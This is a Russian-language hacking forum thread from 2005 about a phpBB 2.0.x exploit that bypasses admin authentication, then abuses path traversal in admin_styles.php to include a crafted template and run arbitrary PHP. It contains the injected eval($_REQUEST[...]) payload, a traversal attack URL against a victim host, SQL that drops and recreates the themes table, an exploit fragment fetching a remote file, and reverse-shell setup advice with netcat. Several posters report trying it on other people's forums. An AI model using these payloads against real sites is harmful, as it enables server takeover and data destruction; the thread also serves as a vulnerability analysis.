phpBB User id Auth. Bypass and "admin

Phoenix

Guest

Это нравится:0 Да/0 Нет

19.03.2005 19:18:54

Поставить последнюю версию форума.
С залатанной багой сплоит не действует.
бага, насколько я понял, используется вот эту для получения прав админа, с последующей вставкой system() в шаблоны (уже имея права админипстратора)

NukLeon

Guest

#62

Это нравится:0 Да/0 Нет

19.03.2005 21:22:25

хех, ясно, почему он пашет...

Код
#define SHELL "$a=fopen(\"http://img58.exs.cx/img58/1584/nc4hk.swf\",

Линк давно умер

походу он закачивает сорец бинда, чтобы потом сделать бекконект

Интересно, какой он использовал... [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]

Shanker мастер Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003 всего лишь человек...	#63 Это нравится:0 Да/0 Нет 19.03.2005 22:00:25 А откуда можно взять свой? Странное расширение для шелла... "Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Barsik

Guest

#64

Это нравится:0 Да/0 Нет

19.03.2005 22:54:03

Цитата
NukLeon пишет: походу он закачивает сорец бинда, чтобы потом сделать бекконект Интересно, какой он использовал... [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]

Походу это просто управление шеллом на флеше

Кстати, попробывал заюзать IE (до этого юзал мозиллу) , что то не получилось,выкидывает на ввод логина. На мозилле все на ура . [IMG]http://www.securitylab.ru/forum/smileys/smiley5.gif[/IMG]

alligator Guest	#65 Это нравится:0 Да/0 Нет 20.03.2005 04:13:09 Гы реальный сплоит респект автору

alligator Guest	#66 Это нравится:0 Да/0 Нет 20.03.2005 06:25:13 У кого нить получилось сделать получить shell ??

Oleg_ Guest	#67 Это нравится:0 Да/0 Нет 20.03.2005 08:44:16 Доступ к конмадной строке - легко, но вот шелл вроде ни у кого не получился.

Stanx

Guest

#68

Это нравится:0 Да/0 Нет

20.03.2005 17:15:00

Не могу выполнить команды РНР
через сплоит /admin/admin_styles.php?mode=addnew&install_to=../../../../. ./../../../../../../../../../../../../../../tmp&nigga=phpinf o();&sid=

когда я ставлю хеш допустим c1f4e10eb9fb68ea61b9c6b640690f79
то выдается така страничка

Warning: main(./../templates/../../../../../../../../../../../../../. ./../../../../../tmp/theme_info.cfg): failed to open stream: No such file or directory in d:\apache\htdocs\phpbb2\admin\admin_styles.php on line 78

Warning: main(): Failed opening ./../templates/../../../../../../../../../../../../../../../ ../../../../tmp/theme_info.cfg for inclusion (include_path=.;c:\php4\pear) in d:\apache\htdocs\phpbb2\admin\admin_styles.php on line 78

Switch Guest	#69 Это нравится:0 Да/0 Нет 21.03.2005 15:45:55 Пояните плз. Что имеется в виду под back shell ip и порт? Что туда стоит указывать?

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#70

Это нравится:0 Да/0 Нет

21.03.2005 20:15:12

Switch
Приплыли... Ты где был когда тут сплоиты юзали для дыр, в которые ломится Сассер?

back shell ip - адрес компа, куда уязвимый сервак, будет коннектиться для получения команд. Ну, и порт - порт того сервака.
Порт этот должен быть на прослушке (ждать соединения). открыть порт можно прогой netcat

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

super hacker Guest	#71 Это нравится:0 Да/0 Нет 22.03.2005 06:50:48 lol epta v shkolu nah :!!!

Dizbalans

Guest

#72

Это нравится:0 Да/0 Нет

22.03.2005 09:02:24

Цитата

Mag пишет:
нее...тут фича не в этом...я под админом и так залогинюсь, эта бага еще 2 недели назад была найдена с куками..тут прикол в другом..сплойт сначала делает тебя админом, а потом с помощью хитрых манипуляций в админке отдает тебе весь сервак, на котором расположен форум

как это зделать скажи плиз, и я большее с странице не могу не куда попать кроме администраторской, выкидывает

Transmutagen Guest	#73 Это нравится:0 Да/0 Нет 22.03.2005 12:57:07 БлиН!! Уже столько форумов испробовал, нифига не действует [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] максимум только попадаю в админку

Frozen

Guest

#74

Это нравится:0 Да/0 Нет

24.03.2005 03:42:02

Цитата
Phoenix пишет: бага, насколько я понял, используется вот эту для получения прав админа, с последующей вставкой system() в шаблоны (уже имея права админипстратора)

Наверное опишу более подробно, что же делает этот эксплойт и что использует, тем более, что выполнение команд тут сделано довольно изящно =)
Сплойт, используя вышеописаную уязвимость с кукой, получает sid с админинскими правами. Я же использовал свой реальный sid, так как на форуме я был админом, а саму багу с кукой уже пофиксили.
Далее сплойт вытягивает бекап форума, дабы посмотреть на префикс таблиц. Процедура необязательная, но позволяет сделать сам сплойт более универсальным.
Следующим действием есть создание фейкового шаблона. (restore base позволяет выполнить любые sql запросы к базе из указанного нами файла). В целом, выполняются следующие запросы:

Код
DROP TABLE phpbb_themes; CREATE TABLE phpbb_themes(...); INSERT INTO phpbb_themes(...); INSERT INTO phpbb_themes(...);

Для чего удалять таблицу? Потому что нам необходимо довольно длинное поле template_name, которое по умолчанию равно 30 байтам. После удаления таблицы и создания ее заново, но уже с измененным размером поля, мы добавляем в базу описание стандартного шаблона subSilver, и свой шаблон, с именем "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tm p". Для чего нам все это?
Взглянем на кусок кода из admin_styles.php, фрагмент отвечающий за экспорт параметров шаблона.

Код

case "export";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($HTTP_POST_VARS[export_template])
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $template_name = $HTTP_POST_VARS[export_template];
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ...
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; формируем файл экспорта шаблона
&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ...
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$fp = @fopen($phpbb_root_path . templates/ . $template_name . /theme_info.cfg, w);

Таким образом, наш шаблон, с фековым именем и кучей "../" создастся в /tmp сервера.
Стоит отметить, что шаблон, это обыкновенный файл с заголовками пхп в начале и конце. Формат шаблона следущий

Код
<?php $имя_шаблона[0][параметр1] = "значение1"; $имя_шаблона[0][параметр2] = "значение2"; ... ?>

для стандартного subSilver он будет таков:

Код
<?php $subSilver[0][template_name] = "subSilver"; $subSilver[0][style_name] = "subSilver"; ... ?>

А в нашем случае, мы имеем вот это:

Код

<?php
$aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../tmp[0][style_name] = "FI Black";
$aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../tmp[0][head_stylesheet] = "fiblack.css";
...
?>

Очевидно, что если сделать include такого шаблона и подставив в переменную nigga любой php код, то он будет выполнен.
Как же сплойт инклудит этот файл?
Вот кусок все того же admin_styles.php, код отвечающий за добавление новых шаблонов:

Код

case "addnew":
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$install_to = ( isset($HTTP_GET_VARS[install_to]) ) ? urldecode($HTTP_GET_VARS[install_to]) : $HTTP_POST_VARS[install_to];
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if( isset($install_to) )
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; include($phpbb_root_path. "templates/" . $install_to . "/theme_info.cfg");

Видно, что подставив в install_to "../../../../../../../../tmp" мы получим опять таки путь к /tmp сервера в котором и будет инклудится theme_info.cfg созданый нами ранее.
В итоге запрос http://victim.com/admin/admin_styles.php?mode=addnew&install _to
=../../../../../../../../../../../../tmp&nigga=phpinfo();&si d=админский_сид покажет нам phpinfo.

Зачем я все это делал и разбирался? У меня не работал сплойт из статьи, уже в процессе я понял, потому что /tmp был запрещен на запись для uid из под которого выполнялся php. Это одна из причин, по которой данный сплойт мог не работать давая лишь админский сид.
Кстати, данные уявимости с шаблонами позволяют администратору форума выполнять любой пхп код даже в версии форума 2.0.13. Сплойт для этого не обязателен, все можно сделать руками.

XJIOP Guest	#75 Это нравится:0 Да/0 Нет 24.03.2005 04:33:16 да мля на 2.0.6 - 2.0.4 - 2.0.8 не катит а остальные мона и без этого сплойта залесть в админку так что нафиг лишний геморой

Frozen Guest	#76 Это нравится:0 Да/0 Нет 24.03.2005 04:38:16 Доступ в админку != выполнение произвольного пхп кода, неоткуда там просто так.

Кто-то

Guest

#77

Это нравится:0 Да/0 Нет

24.03.2005 04:47:08

а нахрена вам это надо? чё вы мучаетесь .. сломаете чей то форум, сотрете все с него и чё дальше? чел поставит себе новую версию (0.13) и востановит ДБ (макс. 2 часа уйдет)... ну и нафига вы стока времени тратите?

Frozen Guest	#78 Это нравится:0 Да/0 Нет 24.03.2005 05:30:48 Тем, кому этот сплойт надобен был для "сотрете все с него" по определению это не нужно.

][лам Guest	#79 Это нравится:0 Да/0 Нет 24.03.2005 15:51:15 еще б объяснил как в 2.13 пхп выполнять, ващеб зашибись было =)

Frozen Guest	#80 Это нравится:0 Да/0 Нет 24.03.2005 17:42:54 Уязвимости не дают доступ к выполнению кода с нуля. Нужно быть админом, к примеру, украв куку.

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?